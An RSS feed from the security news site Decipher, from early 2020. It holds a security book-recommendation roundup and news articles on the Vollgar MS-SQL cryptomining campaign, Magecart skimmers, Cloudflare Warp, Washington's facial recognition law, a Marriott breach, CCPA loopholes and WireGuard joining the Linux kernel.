<![CDATA[Decipher]]> https://decipher.sc Decipher is an independent editorial site that takes a practical approach to covering information security. Through news analysis and in-depth features, Decipher explores the impact of the latest risks and provides informative and educational material for readers curious about how security affects our world. Fri, 03 Apr 2020 00:00:00 -0400 en-us info@decipher.sc (Amy Vazquez) Copyright 2020 3600 <![CDATA[Decipher Library: First Edition]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/decipher-book-club-first-edition https://duo.com/decipher/decipher-book-club-first-edition Fri, 03 Apr 2020 00:00:00 -0400

Reading is fundamental and it's one of the few pastimes available to everyone right now that can act as a diversion and bring a little pleasure to daily life. The choices of what to read when it comes to security and privacy related books can be overwhelming, with decades of excellent work available, from technical and instructional books to historical accounts, biographies, and fiction. We asked folks in a variety of roles and with a broad range of experiences from across the security community to give use their reccommendations, and we've compiled them here for your enjoyment.

Engineering a Safer World, by Nancy Leveson

Usually when asked for a book recommendation, I either go with a book on cognition (like Gary Klein's The Power of Intuition), or with a scifi/fantasy novel (Max Gladstone's Empress of Forever); but today I'm going old-school. Nancy Leveson is the pioneer of the world of complex systems safety, and security in the Internet era is really a subdomain of that. This is a dense book, because it's really a textbook; but its chapters stand alone, and it's required reading for my entire organization, so I give it to y'all as a recommendation. - Andy Ellis, CSO, Akamai

Attacking Network Protocols, by James Forshaw

When my friend James Foreshaw asked me to write the foreword to his first book, I was floored. Here was one of the most brilliant minds in security telling me that I had played an important enough role in his life, in his career, that I was the only person he could think of to write it. All I had done, in my mind, was beg my smart friend to please look at the new bug bounties I had created at Microsoft - because even though he’d never looked into hacking IE or defeating Windows mitigations before, only .NET framework, I knew James had it in him to find more. And he did. He made history. I got to call him while shivering outside building 27 to tell him that he was the first recipient of Microsoft’s $100,000 bug bounty. The bounty that would launch a thousand more. This book to me represents friendship, and believing in the potential we see in each other, which is far weightier in this world than the sum of the wonderful words on the pages of any book. - Katie Moussouris, CEO, Luta Security

The Masters of Deception: The Gang That Ruled Cyberspace, by Michele Slatalla and Joshua Quittner

When I was growing up, one of my favorite books about hackers was Masters of Deception about the legendary crew from New York City, MOD, and their feud with the Legion of Doom (LOD). There are many subtle nods to MOD in other popular hacker media such as the classic 1996 movie Hackers, which takes place in NYC. While the book only lightly touches on X.25 hacking techniques, you can always learn a little more in Phrack. Both this book and MOD are important stories in hacker history. - Dino Dai Zovi, head of security, Cash App at Square

How to Measure Anything in Cybersecurity Risk, by Douglas W. Hubbard & Richard Seiersen

Hubbard and Seiersen break down cybersecurity risk in a way that every cybersecurity person should understand. They take advanced concepts, and discuss them in a way that is relatable and applicable to any organization. One of the elements of the book I find most effective is how it dispels myths related to risk calculations and sample sizes needed to make good risk decisions. — Marcus J. Carey, enterprise architect, ReliaQuest, and co-author of Tribe of Hackers: Cybersecurity Advice From the Best Hackers in the World

The Weather Experiment: The Pioneers Who Sought to See the Future, by Peter Moore

This book is a fascinating history of the very gradual process of understanding the weather. The shape of a hurricane is obvious today because of satellites, but was worked out by people writing each other letters containing observations. The existence of weather offices was highly political, and at times defunded for the offense of offering to predict the weather. There's an interesting relationship to cybersecurity, in that it took quite some time to even figure out what was worth observing, and much more time to start to collect, correlate and understand it all. The benefit of all that work wasn't visible at the start. I don't think that we know the shape of a hurricane yet, and our fits and starts at collecting and sharing knowledge might not be capturing the right things, or making it available to the right people. -- Adam Shostack, consultant, and author of Threat Modeling: Designing for Security, co-author of The New School of Information Security

The Code Book, by Simon Singh

Spycraft: The Secret History of the CIA's Spytechs, From Communism to Al-Qaeda, by Robert Wallace, H. Keith Melton, Henry R. Schlesinger

Engineering Trustworthy Systems: Get Cybersecurity Design Right the First Time, by Sami Saydjari

Security Engineering:A Guide to Building Dependable Distributed Systems, Ross Anderson

I would say a “must read” is The Code Book. This not only gives history of cryptography but insights into the context of security overall. I recommend my students read Spycraft by Wallace, Melton, and Schlesinger. It isn’t specifically related to cyber, but I tell them to think about the mindset of “No one would ever spend what it would take to break our security” and whether that is a wise position to take. I also can recommend Engineering Trustworthy Systems: Get Cybersecurity Design Right the First Time by Sami Saydjari. It is a real tour-de-force on understanding what goes into building a system with security in mind. Second to the Saydjari book (and a bit older) is Security Engineering by Ross Anderson. -- Gene Spafford, Professor of computer science, Purdue University, founder of Center for Education and Research in Information Assurance and Security (CERIAS), co-author of _Practical Unix and Internet Security_

The Practice of Network Security Monitoring, by Richard Bejtlich

While an older title, I still regard this book as one of the true legendary works that breaks down both the philosophy of intrusion detection, as well as the tactical elements of architecture, configuration, and operational monitoring. Many books have been written on this topic since (some by the same author), but at the time of its release, there had never been anything remotely close to the level of detail, technical specificity, and accuracy Richard Bejtlich poured into this resource. His experience over many years doing this work shows immediately, and I referred to this book numerous times while in the trenches of a number of organizations' networks. Even today, it's highly recommended as a great background on the subject, especially for newer security analysts, engineers, and architects. - Dave Shackleford, owner of Voodoo Security

The Gift of Fear and Other Survival Signals That Parotect Us From Violence, by Gavin De Becker

One of my favorite books about security that is focused on people and behavior rather than computers, but no less useful. Gavin De Becker uses this book to define a list of PINs, or Pre-Incident Indicators, that you can be cognizant of in order to potentially see a bad situation before it happens. While it can be a hard read at times, using real life stories to help backdrop the knowledge in the book, the content can be used to both recognize and mitigate threats often seen in cyberspace as well. — Nick Steele, senior R&D engineer, Duo Labs

The Cuckoo’s Egg, by Clifford Stoll

Published in 1989, The Cuckoo’s Egg is a first-hand account of Stoll’s search for a hacker who infiltrated the Lawrence Berkeley National Laboratory. Long before APTs were classified and monitored, Stoll, who is an astronomer by trade, describes the detective-like methods he used to find the hackers. This story turns into a wild tale of cyber espionage involving the United States intelligence agencies and the KGB. - Vanessa Sauter, senior strategy analyst at Cobalt.io

The Mastermind, by Evan Ratliff

It's the wild true story of Paul Le Roux, a brilliant programmer who went from running a shady network of websites for ordering pharmaceuticals online, to being an international crime kingpin. He had dealings everywhere from the Philippines to Somalia to North Korea, running hard drugs and guns and ordering hits on those who fell out of his favor. Oh, and he may also have written the TrueCrypt file-encryption software that for years was widely used for normal, legitimate purposes. His use of encrypted systems to protect himself and his henchmen demonstrates the futile stupidity of government efforts to ban strong encryption in the name of fighting crime. Criminals already have access to such tools, and smart ones like Le Roux can even roll their own. And, as his eventual downfall illustrates, even crypto-savvy criminals can still be caught. - Riana Pfefferkorn, associate director of surveillance and cybersecurity, Stanford Center for Internet and Society

Intelligence-Driven Incident Response, by Scott J. Roberts and Rebekah Brown

If you want to transition from whack-a-mole detection and response to a strategic incident response program that is fueled by threat intelligence, then this is the book for you. The authors guide you through aligning your incident response and threat intelligence capabilities through the "F3EAD" process: Find, Fix, Finish, Exploit, Analyze, Disseminate. There is also a chapter dedicated to the strategic components of a threat intelligence program, which will help you demonstrate value to your executives and might even justify some budget for your security program. Also, Scott and Rebekah are lovely people and great members of our community. - Rick Holland, CISO and VP, Digital Shadows

The Smart Girl's Guide to Privacy, by Violet Blue

Both my kids were required to read it when they turned 13 and were allowed to create social media accounts. I understand why the book is gender-specific, but I wish there was a version that wasn't. Most of the information in it is good general advice for anyone putting themselves out there on the Internet. Having "girl" in the title makes it a bit more difficult to sell boys (and men) on reading it as well. — Adrian Sanabria, Advocate at Thinkst Applied Research

Neuromancer, by William Gibson

I think I was a freshman or sophomore in high school when a friend handed me Neuromancer. As an introverted kid with an interest in electronics, a not-exactly-above-the-board dial-in to a VAX and a separate SLIP link (look it up kids), as well as copies of 1984 and Animal Farm on my desk, I was fairly well primed to dive into the dizzying prose of William Gibson's Neuromancer. Art imitates life, as the exploits of Case and Molly in this early vision of cyberspace inspired me to become even more deeply interested in what is now called cybersecurity. I followed up reading the novel with t-files pulled from FTP sites and HPCVA boards before search engines worked, and later met kindred spirits online that have become my colleagues, my friends, and my family of choice some 25 years later.

Thankfully, we avoided turning into a deeply unequal, drug-addled corporatocracy where shady organizations deploy AI's on staggering collections of data to manipulate the populace at large (ahem). Gibson's dystopia did have one glimmer of hope: no cell phones. Even if the technology predictions are slightly off, the remarkable level of prescience exhibited by his world-building and the retro-futuristic vibes make Gibson's work essential reading decades later.

NB: I had the opportunity over 15 years ago to talk to Mr. Gibson on the phone as he asked for a realistic hacking scenario for a friend's work. I don't remember if I had the chance to thank him for inspiring my entry into a subculture and my career, but he has my gratitude. -- Adam O’Donnell, Ph.D., principal engineer, Cisco

Data Story: Explain Data and Inspire Action Through Story, by Nancy Duarte

When I look over my bookcase for ones that I would recommend I can’t help but land on this one. Security professionals are very good at their core competencies. The issue that arises is with the ability of many security practitioners to communicate effectively. What Duarte’s book does is help the reader to do a far better job of wrapping a narrative around data sets for an audience. Data Story steps the reader through the process of humanizing the data so that it can become more relatable for the audience while adding the element of data visualization. By helping the reader become better at telling a story with their data this vastly improves a security professional's chances at being understood and having their message heard. An excellent book for anyone looking to improve their skills as a presenter overall. - Dave Lewis, advisory CISO, Duo

Little Brother, by Cory Doctorow

Cory Doctorow writes about four teenagers in San Francisco detained and interrogated by DHS after a terrorist attack on the Bay Bridge and BART. They are eventually released, but they are told their movements and actions will be monitored, which they see as a violation of their civil rights. It’s a YA novel, but the discussion of mass surveillance, cryptography (via a key signing party), and social activism is one that we all need to think about. The industry grapples with the quandary that just because technology can do something doesn’t mean we should do it—and this book illustrates how far things can go. The book is allegedly used as training material for NSA recruits to illustrate how people view surveillance, which is pretty awesome, if true. — Fahmida Y Rashid

Cult of the Dead Cow: How the Original Hacking Supergroup Might Just Save the World, by Joseph Menn

When I first heard that Joe was working on a book about the cDc, my initial reaction was: How on earth is he going to track down all those people, let alone get them to tell their stories on the record? Oh, me of little faith. Not only did he get nearly all of the cDc members to talk, he turned what could have been a by-the-numbers historical biography into a vibrant, vital tale of how a small group of curious, clever, and creative people that helped kickstart a revolution that’s still unfolding nearly 40 years later. Many of the people who helped shape the hacker culture that developed in the 1980s and 1990s came from the cDc or other affiliated groups, and their influence has extended from Lubbock, Texas, to Silicon Valley to Capitol Hill, the Pentagon, and the White House. Joe succeeds in conveying the cDc’s mischievous spirit and sense of humor and describing the members’ considerable accomplishments without turning the book into a hagiography. No mean feat, that. - Dennis Fisher

<![CDATA[Long Campaign Compromises MS-SQL Servers by the Thousands]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/long-campaign-compromises-ms-sql-servers-by-the-thousands https://duo.com/decipher/long-campaign-compromises-ms-sql-servers-by-the-thousands Thu, 02 Apr 2020 00:00:00 -0400

An attack group operating from China has been compromising MS-SQL database servers by the thousands for nearly two years, installing multiple backdoors and remote access trojans on the machines, and eventually mining multiple cryptocurrencies.

The campaign has been ongoing since about May 2018 and has affected organizations in a number of industries in the United States, China, South Korea, India, and Turkey, and some of the servers have been infected multiple times over the course of the campaign. Researchers at Guardicore Labs discovered the campaign and found that while the initial infection vector is quite simple, it has been highly effective for an extended period of time thanks to the large number of MS-SQL Server instances exposed to the Internet with weak credentials.

"This attack campaign, like many others of its kind, is opportunistic - it scans the internet for machines with MS-SQL port (1433) open, and breaches these machines using brute-force. We have not seen any evidence of specific targeting. However, once infected - compromised servers send identifying information to the attacker’s command-and-control server, informing them with the machine’s public IP, geolocation, computer name and CPU model. This data will be used when the attacker sells access to these machines on the dark web," Ophir Harpaz of Guardicore said in an email.

The attackers, named Vollgar by the Guardicore researchers, scan the Internet for those exposed machines, often with already compromised servers that are drafted into service, and then try to brute force the passwords. The next step is making a few changes to the configuration of the compromised server to make it easier to use for future tasks.

“Following these settings changes, the attacker performs a series of steps to make the system as out-of-the-box as possible. For example, the attacker validates that certain COM classes are available – WbemScripting.SWbemLocator, Microsoft.Jet.OLEDB.4.0 and Windows Script Host Object Model (wshom). These classes support both WMI scripting and command execution through MS-SQL, which will be later used to download the initial malware binary. The Vollgar attacker also ensures that strategic files such as cmd.exe and ftp.exe have execution permissions,” Harpaz wrote in an analysis of the attacks.

“Planning ahead, the attacker sets multiple backdoor users on the machine – both in the MS-SQL database context and in that of the operating system. In both cases, the users are added to the administrators group to ‘arm’ them with elevated privileges.”

With all of that done, the attackers then hunt for any other malware on a newly compromised server and remove it. The Vollgar attackers also remove a number of registry values that are used by attackers to attach malware to legitimate executables and then installs three separate scripts in different places on the machine to be used as downloaders. In a somewhat unusual twist, the attackers are not using a dedicated attack infrastructure, but instead are running their operations from a machine in China that has been compromised by several other attackers. The Guardicore researchers discovered numerous individual backdoors on the machine. Many of the domains involved in the campaign are registered on freely available top-level domains and the attackers use a web of shell companies and hosting providers to prop up their efforts

“The attacker held their entire infrastructure on the compromised machine. Among the files was the MS-SQL attack tool, responsible for scanning IP ranges, brute-forcing the targeted database and executing commands remotely. In addition, we found two CNC programs with GUI in Chinese, a tool for modifying files’ hash values, a portable HTTP file server (HFS), Serv-U FTP server and a copy of the executable mstsc.exe (Microsoft Terminal Services Client) used to connect to victims over RDP,” Harpaz said.

Eventually, the attackers get around to installing the cryptominers after installing multiple RATs and various other modules.

“Each RAT module attempts to connect to the CNC server on a different port. Ports we’ve seen include 22251, 9383 and 3213. It is fair to assume that the simultaneous connections are for redundancy in case one of the CNCs is down. The communication between the client and server starts with an initial report of information, then continues with periodic heartbeats once every ten seconds,” Harpaz said.

“The attacker is mining both Monero and an alt-coin named VDS, or Vollar. This is an unusual cryptocurrency, combining elements of Monero (full privacy) and Ethereum (smart contracts), pegged relatively close to the dollar.”

Harpaz said that the Vollgar attackers have infected as many as 3,000 servers a day.

<![CDATA[Magecart Sets Sights on the SMB]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/magecart-sets-sights-on-the-smb https://duo.com/decipher/magecart-sets-sights-on-the-smb Thu, 02 Apr 2020 00:00:00 -0400

The prolific Magecart group is using new skimmer code to steal payment card numbers from the websites of small- and medium-sized businesses, RiskIQ researchers found.

The new skimmer, dubbed MakeFrame by RiskIQ, uses iframes on websites to harvest payment data details from websites' shopping cart pages, wrote RiskIQ researchers Jordan Herman and Mia Ihm. The code has been used to harvest payment card data from 19 different websites over the past few months. RiskIQ first observed the card-harvesting code on Jan. 24.

“This version of the skimmer is the classic Magecart blob of hex-encoded terms and obfuscated code,” Herman and Ihm wrote. “It is nestled in amongst benign code to blend in and avoid detection.”

There are multiple versions of MakeFrame currently in use, ranging from programs obviously still in development to production-quality code with encrypted obfuscation.

Magecart is the name given to a collection of attack groups RiskIQ has been monitoring since 2015 who steal payment card information from websites' shopping cart pages. The name comes from the fact that many of the victim websites use the Magento e-commerce software. Magecart groups have targeted several major companies over the years, including Ticketmaster and British Airways. While the groups all use similar attack methods, they also have their own areas of specialization or focus. For example, Magecart Group 5 and Magecart Group 12 are known for targeting the supply chain by injecting skimmer code into third-party JavaScript libraries. Individual sites that load those compromised libraries inadvertently wind up running the attack code. This way, the attackers cast a very wide net of victims by compromising only a few libraries.

Magecart Group 5 appear to also be developing tactics to target routers used by public WiFi operators. Magecart Group 12 was behind the attack on advertising provider Adverline. Magecart Group 8 has its own methods, and is believed to have been behind the recent attack on the NutriBullet website.

Magecart Group 7 is the most likely group using the MakeFrame skimmer, RiskIQ said. The researchers drew this conclusion based on the fact that Group 7 has historically targeted SMBs. Group 7 also typically includes existing functionality on the victims' websites in its skimming operations. That includes hosting the attack code directly on the victim's domain. Group 7 used similar tactics against kichen tools and houseware company OXO previously.

“In some cases, we've seen MakeFrame using compromised sites for all three of its functions — hosting the skimming code itself, loading the skimmer on other compromised websites, and exfiltrating the stolen data,” wrote Herman and Ihm.

The harvested data stays on the victim's server until the attackers are ready to exfiltrate the information. Magecart Group 7 is known to hide stolen data as .php files and then transfer those files to other compromised sites. The researchers were able to identify that one of the servers used for exfiltrating the data belonged to Online SAS, a French cloud computing and web hosting company.

“Each compromised site used for data exfil has also been injected with a skimmer and has been used to host skimming code loaded on other victim sites as well,” the researchers added.

Magecart is constantly innovating and switching its attack methods. "These skimmers are becoming increasingly capable, fulfilling a variety of functions to optimize the work of the operators that deploy them," the researchers wrote.

MakeFrame is just another example of the group's “continued evolution, honing tried-and-true techniques and developing new ones all the time,” the researchers wrote.

Magecart groups tend to be highly active, but the pace of their attacks have increased significantly over the past few weeks, RiskIQ said. Magecart payment skimming attacks have increased by 20 percent ever since many retailers closed their physical stores and moved operations online over the past month. “With many homebound people forced to purchase what they need online, the digital skimming threat to e-commerce is as pronounced as ever,” Herman and Ihm wrote.

<![CDATA[Cloudflare Releases Warp Beta for Windows and macOS]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/cloudflare-releases-warp-beta-for-windows-and-macos https://duo.com/decipher/cloudflare-releases-warp-beta-for-windows-and-macos Wed, 01 Apr 2020 00:00:00 -0400

One year after introducing the Warp service to accelerate and encrypt mobile Internet connections, Cloudflare is introducing a beta of the service for macOS and Windows.

Warp looks and acts much like a VPN, encrypting traffic from the client to the edge of Cloudflare’s content delivery network (CDN). It uses the company’s DNS service to accelerate requests and leverages Cloudflare’s global CDN to deliver content faster than a normal DNS service might. Last April, Cloudflare announced the beta of Warp for iOS and Android as a feature of the app, but the rollout ran into a long backlog of people sitting on the waiting list for several months.

“We always wanted to build a WARP client for macOS and Windows. We started with mobile because it was the hardest challenge. And it turned out to be a lot harder than we anticipated. While we announced the beta of with WARP on April 1, 2019 it took us until late September before we were able to open it up to general availability. We don't expect the wait for macOS and Windows WARP to be nearly as long,” Cloudflare CEO Matthew Prince said.

On Windows and macOS, as on mobile devices, the Warp client uses the WireGuard VPN protocol to secure the traffic from the client to the Cloudflare network. WireGuard’s protocol is designed to be faster and more lightweight than traditional VPN protocols, contributing to the goal of speeding up connections and DNS requests. Warp is not, strictly speaking, a VPN in the vein of products such as PulseSecure or AnyConnect but it provides many of the same features and benefits for users.

“This doesn't just apply to your web browser but to all apps running on your phone. Any unencrypted connections are encrypted automatically and by default. Warp respects end-to-end encryption and doesn’t require you to install a root certificate or give Cloudflare any way to see any encrypted Internet traffic we wouldn’t have otherwise,” Matthew Prince, CEO of Cloudflare, said in a post announcing the original release of Warp for mobie.

After the initial beta period for Warp on macOS and Windows, Cloudflare will roll out support for its Warp+ service, which provides a higher level of speed.

“We plan to add WARP+ support in the coming months to allow you to leverage Cloudflare's Argo network for even faster Internet performance. We will provide a plan option for existing WARP+ subscribers to add additional devices at a discount. In the meantime, existing WARP+ users will be among the first to be invited to try WARP for macOS and Windows,” Prince said.

The basic Warp service for both mobile and desktop platforms is free, but there’s a subscription fee for the Warp+ tier of service. Cloudflare plans to develop a client for Linux in the coming months, as well.

<![CDATA[Washington Is First State to Regulate Facial Recognition]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/washington-is-first-state-to-regulate-facial-recognition https://duo.com/decipher/washington-is-first-state-to-regulate-facial-recognition Wed, 01 Apr 2020 00:00:00 -0400

As the first state with with a law regulating how government agencies can use facial recognition software, Washington provides other states with a blueprint on how—and how not to—tackle the security and privacy questions around the technology.

Facial recognition technology uses a database of known subjects to identify individuals in photographs and videos. Law enforcement agencies and many businesses have embraced the technology, but mounting evidence has shown the technology can be misused in various ways. Several cities, including San Francisco and Oakland, have banned local government agencies from using facial recognition, and some states, including California, Oregon, and New Hampshire, have banned facial recognition from being used with police bodycams. Washington’s law goes further than just bodycams and applies to all public agencies in the state.

Washington’s law, passed March 13 and signed March 31 by Gov. Jay Inslee, established rules governing facial recognition software, such as requiring government agencies to obtain a warrant to run facial recognition scans in investigations, except in the case of emergency. There must be a way to independently test the facial recognition software for “accuracy and unfair performance differences” across skin color, gender, and age. There are also provisions in the legislation requiring training on how to use facial recognition and regular public reporting on how the technology is actually being used. All agencies using facial recognition software to make decisions that produce “legal effects” (meaning decisions that could affect a person’s job, financials, housing, insurance, and education) must have a human review the results, as well.

Microsoft president Brad Smith praised the new regulations in a blog post, calling the law an “early and important model” and “a significant breakthrough.” Smith has previously appealed for a regulatory framework around facial recognition for law enforcement and companies to follow. Banning facial recognition over security and privacy concerns didn’t make sense because the technology could be useful in many applications (such as finding missing persons). The new law established civil liberty safeguards while preserving the public safety benefits, Smith said.

"This balanced approach ensures that facial recognition can be used as a tool to protect the public, but only in ways that respect fundamental rights and serve the public interest," Smith wrote.

The law “in no way absolves tech companies of their broader obligations to exercise self-restraint and responsibility in their use of AI.”

The law did not go far enough to protect marginalized groups, said Jennifer Lee, head of the ACLU of Washington’s Technology and Liberty Project. Agencies could “use face surveillance technology to deny people essential services and basic necessities such as housing, health care, food, and water.” The “human review” specified in the law was not a “sufficient safeguard,” because humans also have biases and cannot provide the necessary oversight over these kinds of critical decisions, Lee said.

It also did not help that the law has no enforcement mechanism to ensure the agencies followed the provisions.

“We will continue to push for a moratorium to give historically targeted and marginalized communities, such as Black and Indigenous communities, an opportunity to decide not just how face surveillance technology should be used, but if it should be used at all,” Lee said in a statement.

The law originally called for a task force to study how government agencies use facial recognition, but Gov. Inslee vetoed that part of the legislation, saying funding was unavailable. Lawmakers should instead solicit advice from local universities, Inslee said. ACLU’s Lee said the veto removed “any semblance of community oversight.”

The law “in no way absolves tech companies of their broader obligations to exercise self-restraint and responsibility in their use of AI,” Smith warned. In the absence of other state laws and federal regulations, technology companies need to voluntarily adopt and implement responsible AI principles, he said.

“Some will argue it does too little. Others will contend it goes too far.”

Facial recognition systems have come under increased scrutiny by lawmakers and privacy advocates recently. An experiment by the American Civil Liberties Union found that Amazon’s Rekognition software incorrectly matched 28 members of Congress with a mugshot database of people arrested for committing a crime. The ACLU also recently sued the federal government demanding more details on how border control agents scan travelers’ faces at the United States border, as well as the government’s plans on expanding its facial recognition programs.

Smith has previously asked Congress to regulate the use of facial recognition technology. Other companies working on facial recognition software have also expressed support for regulation.

“It’s [facial recognition] a perfect example of something of that has really positive uses, so you don’t want to put the brakes on it. At the same time there’s lots of potential for abuses of that technology, so you do want regulation,” Amazon CEO Jeff Bezos said last year, according to GeekWire. “Good regulation in this arena would be very welcome I think by all the players.”

While the likelihood of Congress acting anytime soon is low, federal lawmakers have asked law enforcement agencies how the technology is being used and its accuracy. Smith said Washington’s new law was “an early and important model,” and that regulation “will clearly evolve.” The law shows what legislators can do when they stop arguing about whether facial recognition should be used and focus on how it should be used.

“A real-world example for the specific regulation of facial recognition now exists,” Smith said in the blog post. “Some will argue it does too little. Others will contend it goes too far. When it comes to new rules for changing technology, this is the definition of progress.”

<![CDATA[Decipher Podcast: Rich Mogull]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/decipher-podcast-rich-mogull https://duo.com/decipher/decipher-podcast-rich-mogull Tue, 31 Mar 2020 00:00:00 -0400

<![CDATA[Marriott Discloses New Data Breach]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/marriott-discloses-new-data-breach https://duo.com/decipher/marriott-discloses-new-data-breach Tue, 31 Mar 2020 00:00:00 -0400

Two years after disclosing one of the larger data breaches ever, Marriott has notified customers of another incident, this one affecting about 5.2 million people.

The breach involved improper access to a software system that Marriott uses as part of its guest services at franchise properties. Company officials said the information compromised during the breach includes names, addresses, email addresses, company affiliations, birth dates, phones numbers, and some details of victims’ Marriott Bonvoy loyalty accounts. Marriott officials said no passwords, payment card, or passport information was affected by the incident.

“Hotels operated and franchised under Marriott’s brands use an application to help provide services to guests at hotels. At the end of February 2020, the company identified that an unexpected amount of guest information may have been accessed using the login credentials of two employees at a franchise property,” the Marriott statement says.

“The company believes that this activity started in mid-January 2020. Upon discovery, the company confirmed that the login credentials were disabled, immediately began an investigation, implemented heightened monitoring, and arranged resources to inform and assist guests. Marriott also notified relevant authorities and is supporting their investigations.”

Although Marriott officials said that Bonvoy loyalty account passwords were not part of the information compromised in the breach, the company said it would require Bonvoy members affected by the incident to update their passwords.

“If you are a Marriott Bonvoy member and we have determined that your information was involved: We have disabled your existing Marriott Bonvoy password, so when you log in to your Marriott Bonvoy account at Marriott.com, you will be prompted to change your password. You will also be prompted to enable multi-factor authentication to further protect access to your account,” the Marriott notification says.

Marriott sent email notices today to the affected customers and also has set up a dedicated website through which individuals can check to see whether they’re affected. That portal requires people to go through a three-step process to confirm their email addresses and then check the results of their inquiries.

This most recent incident, affecting as many as 5.2 million people, pales in comparison to Marriott’s 2018 breach, which affected more than 500 million customers around the world. That breach was the result of a deep intrusion into the company’s systems and included the theft of a broad range of personal information, including passport numbers and payment card data in some cases.

Marriott is still investigating the breach it disclosed today, so the details of the data affected and the number of people involved may change.

“Although our investigation is ongoing, we currently have no reason to believe that the information involved included Marriott Bonvoy account passwords or PINs, payment card information, passport information, national IDs, or driver’s license numbers,” the company said.

<![CDATA[EFF Says Privacy Loopholes Remain in CCPA]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/eff-says-privacy-loopholes-remain-in-ccpa https://duo.com/decipher/eff-says-privacy-loopholes-remain-in-ccpa Mon, 30 Mar 2020 00:00:00 -0400

California is expected to begin enforcing its new consumer privacy law starting July 1, but the Electronic Frontier Foundation is concerned about all the loopholes that still remain.

California’s privacy law, which took effect in January, is considered to be among the most—if not the most—comprehensive consumer privacy law currently on the books in the United States. The regulations released by the state attorney general on how to implement the law posed a “‘good step forward’ that could have gone further,” EFF staff technologist Bennett Cyphers wrote. The regulations have been modified twice—once in February and again in March—and “some of the worst features of the regulations have been cut,” Cyphers wrote.

However, the regulations in the current form “still falls short of a user-friendly implementation of CCPA,” Cyphers wrote.

The EFF joined a coalition of privacy advocates to send a letter requesting the state attorney-general “to close business-friendly loopholes and make the CCPA an effective, enforceable tool for user privacy,” Cyphers wrote. The signatories to the letter include the EFF, American Civil Liberties Union of California, Campaign for a Commercial-Free Childhood, the Center for Digital Democracy, Common Sense Media’s policy arm Common Sense Kids Action, Consumer Action, the Consumer Federation of America, Media Alliance, Oakland Privacy, and the Privacy Rights Clearinghouse.

Even after the second round of modifications, it is still hard for consumers to exercise their right to opt out of the sale of their personal information, Cyphers noted. At the moment, businesses can ignore the user’s privacy-specific preferences if they were set in the software, such as the “do not track” option in web browsers. The issue centers around the idea of a “clear signal” and whether a user asking to opt out of tracking is also asking to opt out of sale of user data.

Major web browsers have a setting which lets users choose to send “do not track” headers—which tells sites to not collect the user’s data—with all of their web traffic. The privacy coalition’s letter argued that the setting should be a treated as clear signal to the business that the person has opted out of the sale of the information, and that the person should not have to explicitly tell individual businesses to not sell his or her information.

“A business that cannot collect a person’s information cannot sell that information,” the coalition’s letter said. “The greater (do not collect) includes the lesser (do not sell).”

The regulations currently state in [Sec 315 (d) (1)]: The privacy control shall require that the consumer affirmatively select their choice to opt-out and shall not be designed with any pre-selected settings.

The privacy coalition wants to remove the the clause about the pre-selected settings and make it explicitly clear to businesses that they have to treat the request to opt out of tracking as an opt-out for sale: A business shall treat a “Do Not Track” browsing header as such a choice.

The changes introduced in the latest modifications “threat to undermine the intent of the law.”

“Many consumers choose the software they use specifically to reflect their privacy choices,” the letter said. “If a user selects a browser extension or application in order to protect their privacy, they should not also need to select a separate setting in order to enjoy one of the most important privacy protections granted by CCPA, the right to opt out of sale.”

The privacy groups also took exception to the fact that data brokers that did not collect information directly from consumers didn’t have to notify the consumers they had that information. Under the original regulations, these businesses had to try to notify the consumers of the right to opt-out of the sale of the information, but the modifications since then have removed the condition that “efforts needed to be made to notify the consumers.

“Subsequent modified draft regulations have all but eliminated notice to consumers when their information is collected and sold by data brokers and other entities, many of which consumers have no knowledge of,” the letter stated.

The latest modifications have changed requirements so that data brokers don’t have to notify consumers even if they collect information directly from consumers. “If a business collects information directly from consumers, it should provide robust notice at collection, whether it is a data broker or not,” the letter said. “There is no reason why data brokers—whose business model is particularly pernicious to privacy—who collect information directly from consumers should provide any less notice than other companies who collect information directly from consumers.”

The coalition requested the attorney general revise the regulations to: A business that is registered as a data broker with the Attorney General pursuant to Civil Code section 1798.99.80 et seq. does not need to provide a notice at collection to the consumer if the information is not collected directly from the consumer and the business has included in its registration submission a link to its online privacy policy that includes instructions on how a consumer can submit a request to opt-out.

EFF’s Cyphers said the changes introduced in the latest modifications “threat to undermine the intent of the law.”

<![CDATA[WireGuard VPN Added to Linux Kernel]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/wireguard-vpn-added-to-linux-kernel https://duo.com/decipher/wireguard-vpn-added-to-linux-kernel Mon, 30 Mar 2020 00:00:00 -0400

With the sharp increase in the number of people working from home and requiring secure access to remote resources, interest in and usage of VPNs has spiked, as well. So it’s an opportune time for the WireGuard VPN to make its way into the Linux kernel, an addition that will make the technology available by default to millions of Linux users.

WireGuard is a fast, flexible VPN that was designed specifically for Linux implementations, but it has been a third-party addition until now. With the release of Linux 5.6 today, WireGuard is now included in the kernel by default and will make its way into the downstream distributions, as well.

“The last several weeks of 5.6 development and stabilization have been exciting, with our codebase undergoing a quick security audit, and some real headway in terms of getting into distributions,” Wireguard developer Jason Donenfeld said in an announcement of the Linux kernel addition.

WireGuard was developed as a replacement for the heavier and more complex existing VPN protocols such as IPsec and the popular implementations such as OpenVPN. One of the drawbacks of those larger and more complex systems and protocols is that they can be quite difficult to implement and even more difficult to audit or verify. WireGuard is meant to be both high-performance and easy to audit, making it simpler for a single person or small team to dig into.

“Key exchanges, connections, disconnections, reconnections, discovery, and so forth happen behind the scenes transparently and reliably, and the administrator does not need to worry about these details. In other words, from the perspective of administration, the WireGuard interface appears to be stateless,” the original WireGuard technical paper says.

“Firewall rules can then be configured using the ordinary infrastructure for firewalling interfaces, with the guarantee that packets coming from a WireGuard interface will be authenticated and encrypted. Simple and straightforward, WireGuard is much less prone to catastrophic failure and misconfiguration than IPsec.”

As the Linux 5.6 kernel makes its way downstream to the other distributions, more and more users will have access to the WireGuard software. That trickle down effect generally takes some time as distributions adopt the new release and then users upgrade their machines. In the meantime, the existing compatibility with older versions of some Linux distributions will be be maintained.

“We'll also continue to maintain our wireguard-linux-compat backports repo for older kernels. On the backports front, WireGuard was backported to Ubuntu 20.04 (via wireguard-linux-compat) and Debian Buster (via a real backport to 5.5.y),” Donenfeld said in tyhe email announcing the release.

